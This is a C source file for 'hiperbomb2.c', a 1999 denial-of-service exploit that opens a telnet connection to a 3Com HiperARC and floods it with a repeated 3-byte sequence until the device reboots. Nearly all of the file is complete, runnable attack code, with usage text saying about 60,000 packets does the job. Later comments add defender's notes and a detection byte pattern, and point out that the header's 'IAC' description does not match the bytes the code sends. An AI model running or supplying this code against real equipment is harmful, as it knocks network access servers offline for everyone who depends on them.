Denial-of-service exploit that sends a large volume of telnet IAC sequences to 3Com's HiperARC, which eventually causes the device to reboot.
dbbcf212057df1232edc1ee2a26005a071ab2569f332337a2f2664387ef59609
/* ---------------------------------------------------------------------
* hiperbomb2.c - Reboots HiperARC faster.
* ---------------------------------------------------------------------
* (c) 1999 - Jonathan Chapman <jchapman@1st.net>
* ---------------------------------------------------------------------
* Sends a high volume of IACs which eventually leads to a reboot of the
* HiperARC. Brief testing indicated that this problem is most likely
* specific to sending IACs rather than any other type of data. Further
* research has shown that specific IAC patterns are more likely to cause
* a reboot. In this example I use one of the most efficient combinations
* I have discovered. Through my testing it usually required at least
* 60,000 packets to cause the HiperARC to reboot.
* ---------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdarg.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
/* Target host name, taken from the first command-line argument in main(). */
char *chassis;
/* Descriptor of the TCP socket opened by connect_to_chassis(). */
int sockfd;
/* Number of 3-byte sequences send_iacs() writes; parsed with atoi() in main(). */
int num_of_tries;
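/*
 * Resolve `name` and open a TCP connection to its telnet port (23),
 * leaving the descriptor in the global `sockfd`.
 *
 * Exits the process with status 3 if the name does not resolve, 4 if no
 * socket can be created, and 5 if the connection attempt fails. The
 * original code ignored the result of connect(), so a refused or
 * unreachable target was silently treated as connected.
 *
 * Defender's note: on the wire this step is an ordinary TCP connection
 * to port 23. Limiting which source addresses may reach the device's
 * telnet management service is the control that applies at this stage.
 */
void connect_to_chassis(char *name)
{
    struct hostent *host;
    /* Zero the whole structure so the padding bytes are not stack garbage. */
    struct sockaddr_in remote = {0};

    host = gethostbyname(name);
    if(!host) {
        fprintf(stderr, "Cannot resolve host %s.\n", name);
        exit(3);
    }

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if(sockfd < 0) {
        fprintf(stderr, "Cannot obtain descriptor.\n");
        exit(4);
    }

    remote.sin_family = AF_INET;
    /* Only the first address returned by the resolver is used. */
    remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
    remote.sin_port = htons(23);

    if(connect(sockfd, (struct sockaddr *)&remote, sizeof(remote)) < 0) {
        fprintf(stderr, "Cannot connect to host %s.\n", name);
        exit(5);
    }
}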
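/*
 * Write the fixed 3-byte sequence {254, 36, 185} to `sockfd`,
 * `num_of_tries` times.
 *
 * Protocol note: in telnet (RFC 854) the IAC byte is 255 and 254 is the
 * DONT command; 36 is the number of the environment option. Although
 * the file header describes the traffic as "IACs", the sequence written
 * here contains no 255 byte, and 185 (0xB9) is not a telnet command
 * code. For detection, the observable is the byte pattern FE 24 B9
 * repeated back-to-back, in very large numbers, on one TCP/23 session.
 *
 * The counter is a signed int so that a negative `num_of_tries` sends
 * nothing; with the original unsigned counter a negative value was
 * converted to a huge unsigned bound. The loop also stops at the first
 * failed write instead of continuing on a dead descriptor.
 */
void send_iacs()
{
    const unsigned char reply[3] = {254, 36, 185};
    int k;

    for(k = 0; k < num_of_tries; k++) {
        if(write(sockfd, reply, 3) < 0) {
            break;
        }
    }
}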
/*
 * Entry point: expects a host name and a packet count on the command
 * line, connects to the host and runs the send loop.
 *
 * Exit status is 2 when fewer than two arguments are given and 0 after
 * the send loop returns. The count is parsed with atoi(), which does no
 * validation: non-numeric text yields 0 and negative values are passed
 * through unchanged.
 */
int main(int ac, char **av)
{
    if(ac >= 3) {
        chassis = av[1];
        num_of_tries = atoi(av[2]);

        fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
                chassis, num_of_tries);

        connect_to_chassis(chassis);
        send_iacs();

        /* Printed once send_iacs() returns; no result is inspected here. */
        fprintf(stderr, "Attack complete.\n");
        exit(0);
    }

    /* Too few arguments: print usage and stop. */
    fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
    fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
    exit(2);
}